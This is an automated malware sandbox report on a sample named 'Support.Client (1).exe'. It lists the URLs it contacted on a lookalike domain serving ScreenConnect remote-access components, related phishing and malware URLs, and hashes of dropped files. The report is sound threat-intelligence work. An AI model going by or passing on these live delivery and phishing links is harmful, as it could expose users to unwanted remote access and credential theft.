http://www.founder.com.cn/cn	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/Scr2%	dfsvc.exe, 00000001.00000002.3532689918.000001ECBA44B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000002.00000003.1657089633.00000224B6582000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr	false		high
http://www.jiyu-kobo.co.jp/	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://feedback.screenconnect.com/Feedback.axd	ScreenConnect.Core.dll0.1.dr	false		high
http://www.fontbureau.com/designers8	dfsvc.exe, 00000001.00000002.3528447883.000001ECB9DA2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net	86VMVS2K.log.1.dr	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationh9S	dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll0h&	dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationL37L	dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application561934e089	ScreenConnect.WindowsClient.exe, 00000006.00000002.1933774164.000000000148F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cloud-ssagov.icu/Bin/ScreenConnect.ClientServi	dfsvc.exe, 00000001.00000002.3505558952.000001ECA027B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3505558952.000001ECA0407000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.49.126.73	api.wisescreen.net	United Kingdom		8851	EDGEtaGCIComGB	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1555317
Start date and time:	2024-11-13 18:25:44 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Support.Client (1).exe
Detection:	MAL
Classification:	mal54.evad.winEXE@19/75@3/2
EGA Information:	Successful, ratio: 85.7%
HCA Information:	Successful, ratio: 67% Number of executed functions: 330 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 184.28.90.27, 192.229.221.95, 20.42.65.92
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, cacerts.digicert.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 4416 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Support.Client (1).exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	https://zillow-online.com/realestate/one/drive/docs/	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	2024-2025_Open Enrollment4402462144024621.pdf	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://virtual.urban-orthodontics.com	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://o000005496.photoshelter.com/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://webconference.protected-forms.com/XZmlBeUlkbExkNHYxS3piZldoaGJqTzUrV3RZK1BkOGZVMlRsRGFZcnlYbnJ1K3h1VjJEMnY1d0lXNFNQVmswcXFCTmFqczEyaHMyc3lwSUpvNnFFYlJLemVwaEpGbjRXVnVRRk93ZUxYY0dwRmhsZ010WmVrNTNVR0N0YkdCeTRnTHZMb043aXdiVFo5a25TNjZkVThLaW8wem41RTU3MUl5b2dxWjNpdjFLNWdRSmdxL2ZocGVvdDVBPT0tLVNLdmlEU1hLTGZIRW9VQ0YtLWFoQVVsMnk3VVFLbzBPZHpycUt6OEE9PQ==?cid=2178924675	Get hash	malicious	KnowBe4	Browse	199.232.210.172
	http://googleads.g.doubleclick.net/aclk?sa=L&ai=CJF0hsbsNVNi_DIPR0AGqhIGYDPfOz9MFj-TFvsMB25uy0esBEAEg4_uTA1DMiaOOBWDN8N-A5ALIAQSpAgbEodTv6J0-qAMBmAQFqgSnAU_QL6NE73jlCJ7TFvA2kg2Ig3wrASDHwt7I6P2gJSz2wmCekvewEDUw1zPqYx0NADEmzairfw3ur1wkNI8P6teiwhlldXdj5OGBN4lmsCEDPv86I5o3eNVngnJfRiuDvxlWje20-VfTVoLEZHjLsyN8zQleVTsGbhHjd1BSHfxBMk8P6-QwvlL67TaFDfOyk-sIZEC0a7hK4DdrheQBo-5kNsgA7ijRoAYEgAfP_b4i&num=1&sig=AOD64_1QMErG-pSUGweRO5zdk0lMn9Ngwg&client=ca-pub-6219811747049371&adurl=http://nDmfN.toplogtrans.com.br%2Fcgi-bin%2F9224511553/9224511553/cGFydG5lcmhuZHVhbWVyQHB1cmVzdG9yYWdlLmNvbQ==	Get hash	malicious	Unknown	Browse	199.232.214.172
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	199.232.210.172
	EXT_Transaction Details for Martibs -462fd4a1151861ecbc00b016e69e7825 (18.7 KB).msg	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://www.trendytechinsight.com/sx	Get hash	malicious	Unknown	Browse	199.232.214.172
fp2e7a.wpc.phicdn.net	https://drive.google.com/uc?export=download&id=1iaK9ppq5gLIgMAIIEMZ874KKXqw8TPYH	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://virtual.urban-orthodontics.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://o000005496.photoshelter.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://carrier.businessappdevs.com/Baa9N	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://webconference.protected-forms.com/XZmlBeUlkbExkNHYxS3piZldoaGJqTzUrV3RZK1BkOGZVMlRsRGFZcnlYbnJ1K3h1VjJEMnY1d0lXNFNQVmswcXFCTmFqczEyaHMyc3lwSUpvNnFFYlJLemVwaEpGbjRXVnVRRk93ZUxYY0dwRmhsZ010WmVrNTNVR0N0YkdCeTRnTHZMb043aXdiVFo5a25TNjZkVThLaW8wem41RTU3MUl5b2dxWjNpdjFLNWdRSmdxL2ZocGVvdDVBPT0tLVNLdmlEU1hLTGZIRW9VQ0YtLWFoQVVsMnk3VVFLbzBPZHpycUt6OEE9PQ==?cid=2178924675	Get hash	malicious	KnowBe4	Browse	192.229.221.95
	https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#<EMAIL>	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://googleads.g.doubleclick.net/aclk?sa=L&ai=CJF0hsbsNVNi_DIPR0AGqhIGYDPfOz9MFj-TFvsMB25uy0esBEAEg4_uTA1DMiaOOBWDN8N-A5ALIAQSpAgbEodTv6J0-qAMBmAQFqgSnAU_QL6NE73jlCJ7TFvA2kg2Ig3wrASDHwt7I6P2gJSz2wmCekvewEDUw1zPqYx0NADEmzairfw3ur1wkNI8P6teiwhlldXdj5OGBN4lmsCEDPv86I5o3eNVngnJfRiuDvxlWje20-VfTVoLEZHjLsyN8zQleVTsGbhHjd1BSHfxBMk8P6-QwvlL67TaFDfOyk-sIZEC0a7hK4DdrheQBo-5kNsgA7ijRoAYEgAfP_b4i&num=1&sig=AOD64_1QMErG-pSUGweRO5zdk0lMn9Ngwg&client=ca-pub-6219811747049371&adurl=http://nDmfN.toplogtrans.com.br%2Fcgi-bin%2F9224511553/9224511553/cGFydG5lcmhuZHVhbWVyQHB1cmVzdG9yYWdlLmNvbQ==	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://www.trendytechinsight.com/sx	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
EDGEtaGCIComGB	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	213.210.9.89
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	77.107.70.202
	fvIqrxcfuL.exe	Get hash	malicious	Quasar	Browse	89.213.56.109
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	89.213.146.12
	arm7.elf	Get hash	malicious	Unknown	Browse	77.107.120.22
	JnC2t6WhUf.elf	Get hash	malicious	Mirai	Browse	213.130.144.69
	mhmdm9Hb6i.elf	Get hash	malicious	Mirai	Browse	213.130.144.69
	https://t.ly/nFp5i	Get hash	malicious	Unknown	Browse	213.130.145.203
	x.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	89.213.177.177

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.49.126.73
	https://zillow-online.com/realestate/one/drive/docs/	Get hash	malicious	HTMLPhisher	Browse	185.49.126.73
	Pmendon.ext_Reord_Adjustment.docx	Get hash	malicious	Captcha Phish	Browse	185.49.126.73
	Factura de proforma.exe	Get hash	malicious	AgentTesla	Browse	185.49.126.73
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	185.49.126.73
	https://uxfol.io/p/b02d8c67/029f480a	Get hash	malicious	Unknown	Browse	185.49.126.73
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.49.126.73
	https://bonzibuddy.org/Bonzi.zip	Get hash	malicious	Unknown	Browse	185.49.126.73
	https://wetransfer.com/downloads/dfae2da4024c0a427ba385707deb5ffa20240620022822/9659fc	Get hash	malicious	Unknown	Browse	185.49.126.73

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe	Rechnung_10401.js	Get hash	malicious	ScreenConnect Tool	Browse
	Rechnung_Datum_November 24_6957.js	Get hash	malicious	ScreenConnect Tool	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool	Browse
C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.ClientService.exe	Rechnung_10401.js	Get hash	malicious	ScreenConnect Tool	Browse
	Rechnung_Datum_November 24_6957.js	Get hash	malicious	ScreenConnect Tool	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.363788168458258
Encrypted:	false
SSDEEP:	6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
MD5:	0E72F896C84F1457C62C0E20338FAC0D
SHA1:	9C071CC3D15E5BD8BF603391AE447202BD9F8537
SHA-256:	686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
SHA-512:	AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
Malicious:	false
Preview:	*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3108156547894207
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrN:KooCEYhgYEL0In
MD5:	24D58CA00E8398EB1B27F748571D1870
SHA1:	B81577046C0CD44F5C6386952F91052E063173CA
SHA-256:	8B5D5AB7229D610D76C26053467DF708C24B4132881EB3091023DDEDC1BF5957
SHA-512:	4F7E34730628DD88C92E6292EFFF9EB1E231E5E0BBAF01EC42EF164D991118B1751ED90EAD260F1729FC8AF78C98E404D06DDF32FB0BAE30D27FB5ED503129A4
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x39262442, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221978731967017
Encrypted:	false
SSDEEP:	1536:fSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:fazag03A2UrzJDO
MD5:	A8C1862C833D2EB257615BE9B4808E9A
SHA1:	DFE882784E45E2ED40C0ECDC1AEAEFD562F1B079
SHA-256:	C77ECD2A2A1A3226E315F53BF0A0684272A2F3C0F21D8A01B7A2160DBB9A6E59
SHA-512:	6E616C8AD1973165160584BBC5D1D6C51E6C6E0A60ED24937511B53B2E62B0734D053035973034B2C1BB61FDEB58EC7D751F64E04C67257A6111294C9BB21B2C
Malicious:	false
Preview:	9&$B... .......Y.......X\...;...{......................n.%..........\|..!....\|..h.#..........\|..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................4.z.....\|.....................(.....\|...........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07917040445276334
Encrypted:	false
SSDEEP:	3:ZeetYez8yk+/tnu2AY/tDY/tollOE/tlnl+/rTc:pzzBdrWepMP
MD5:	25D1352EF0F3D2DC1ABBFC5F5B03E015
SHA1:	E2E2DCA96C6ECFB19349ADBAEA4CF7EA85FC31BF
SHA-256:	9CD1C2BECEAA71F6C085E3593735757B7471811B0D62343E75FB38C547C56E60
SHA-512:	5EB8E8DA0804B8618E77EF20F2B643E57F0CCB351A64A91FFEC99F479100E0551EB6DF327869385879E6E8EE86987D347ECBD6D438D8E589F73D49699A5411C2
Malicious:	false
Preview:	fwUm.....................................;...{..!....\|.......\|...............\|.......\|..Q........\|.....................(.....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Support.Client (_5a63c4432494455eb3628cc1cc7766c341e5_7de988b1_f7842060-755f-4376-8235-8587ed83ab01\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9064635903983081
Encrypted:	false
SSDEEP:	96:1wEZFB7bR1SoEY3sdXhrGXyf8QXIDcQvc6QcEVcw3cE/PgRgZ+HbHg/JgnQoFyOl:dTnNx380BU/4jsxlzuiFBZ24IO83
MD5:	F6CDA12CF23ED94772C396E319C92C41
SHA1:	B6CCBA543CC24613F19AB0D7C862E15ACCD10C2E
SHA-256:	CADCA4672EFDD9C307C7E62C34B422CFA4649844100C678444C4CD76ECA7B9FE
SHA-512:	8870BBA9D7B6AB8F76D459DBC725E36630DE3883AA3524B342D4FEBA9F6C1EA5821A3C91FDFBB5C06411B613563FA0D2E961BD8EB43A7B4855AE1C18DE9E902B
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.9.9.2.4.3.3.3.2.1.1.6.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.9.9.2.4.3.3.7.8.3.8.4.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.8.4.2.0.6.0.-.7.5.5.f.-.4.3.7.6.-.8.2.3.5.-.8.5.8.7.e.d.8.3.a.b.0.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.6.2.8.3.8.8.-.1.e.8.5.-.4.d.9.e.-.9.4.7.6.-.8.6.3.a.6.1.a.5.0.5.4.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.u.p.p.o.r.t...C.l.i.e.n.t. .(.1.)...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.e.4.-.0.0.0.1.-.0.0.1.4.-.7.e.5.f.-.a.f.2.e.f.1.3.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.1.8.2.0.5.6.4.5.7.e.9.7.c.1.a.1.b.7.f.d.5.e.0.b.6.5.d.a.6.3.e.0.0.0.0.f.f.f.f.!.0.0.0.0.2.2.f.7.0.4.d.2.9.9.c.0.1.6.0.0.3.8.9.6.5.a.d.4.1.d.6.a.4.8.6.e.5.c.1.2.5.f.5.5.!.S.u.p.p.o.r.t...C.l.i.e.n.t. .(.1.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3609.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Nov 13 17:27:13 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	69002
Entropy (8bit):	1.7532186843168205
Encrypted:	false
SSDEEP:	384:c6LQCFylEI/ooL5ktWX63pwtBbMiy8CdRl:rVEEI/RFbB+l
MD5:	8FD74123C0E10C75765E0AA563F5BB6A
SHA1:	D3E8C8204D2B82F237E1F67BE51D51DB26BEDB63
SHA-256:	C0E75CB1F78D07408410E5242054617D5D2D3C26CE699942F49D73A3C63E8E97
SHA-512:	82A5DE732F4DF5F9C3EAD4BEB28BB6C4C6C8B14FB37AF0111072C6AF684606E21DCB2D2BDA4D3E6D5BB61DBACFE356F8F1244566A11773AF61835706EA7283D0
Malicious:	false
Preview:	MDMP..a..... .......q.4g............$...............8.......<...............P5..........`.......8...........T...........@ ..J...........0...........................................................................................eJ..............GenuineIntel............T...........H.4g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER36D5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8356
Entropy (8bit):	3.701406372348481
Encrypted:	false
SSDEEP:	192:R6l7wVeJrp6U6Y9iSU9HgmfStAbprT89bbxXsfTBhm:R6lXJ16U6YYSU9HgmfStvbxcf1c
MD5:	3B65676348B0F0638C084AB3DE1671CE
SHA1:	04CD17BD451A0E83B08EC9E34D784B95684080EB
SHA-256:	FDEC755C9AE30192CD12217C87D35E764A25443DD8AB2AED6A0062FEC271ED5A
SHA-512:	62B4C67DEF824431E046F1308513A75035F779BF9A268CDDE247E348938014456F6E4E9ECFD606D0BC3D045360208C3B558F4D0AF8EE4D213D1D976C0A1FB03E
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3724.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4633
Entropy (8bit):	4.487535898770652
Encrypted:	false
SSDEEP:	48:cvIwWl8zsRJg77aI9fkWpW8VYUYm8M4JELF+Cv+q8RxfO3Z9d:uIjfjI7x97VEJvCvKG3Z9d
MD5:	79E822CF73C693644BB916CD4C3A9EFE
SHA1:	A8AA5C3DADC985B048A2BCFD9565130F72EAF6A3
SHA-256:	13C78FA5D8856DF5CA17085DBDA77EB4D0222949E7765242868FC182CD62FB46
SHA-512:	F1B826D8F0D8947A64BD88BB74C5ABDA03B1B63248981309E428CEC9D71122CD2EBA43B63D54376DDDF8B3D758C2292934132E6F6AF99CB48FBE0B0E2D7CB7F4
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="586589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3741.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	76924
Entropy (8bit):	3.040390762040474
Encrypted:	false
SSDEEP:	768:DyG8zsa+F4OxjAmVA6lKiIjb3GzZbt+Yj4P4:J8f+F4WVA4ObWz1t+c4P4
MD5:	4F68D74B118DAE3060CE944EBA3E454D
SHA1:	AFF3EB6A7B43FD79B945E1FB3CD3B69D93AB279A
SHA-256:	FA6A1EDAEAF616423CFB0A9F1D12CD629A30C2308E3EA64316F31A32C762CC2A
SHA-512:	009CD7751FFEAF28B9548A845EDDCD36617635514844775A1078F217A4DC9FB44C573B9DE083BA3163CFA60CF9DC53EB3574B1561DC68E2A17B8419A16CB1CFF
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f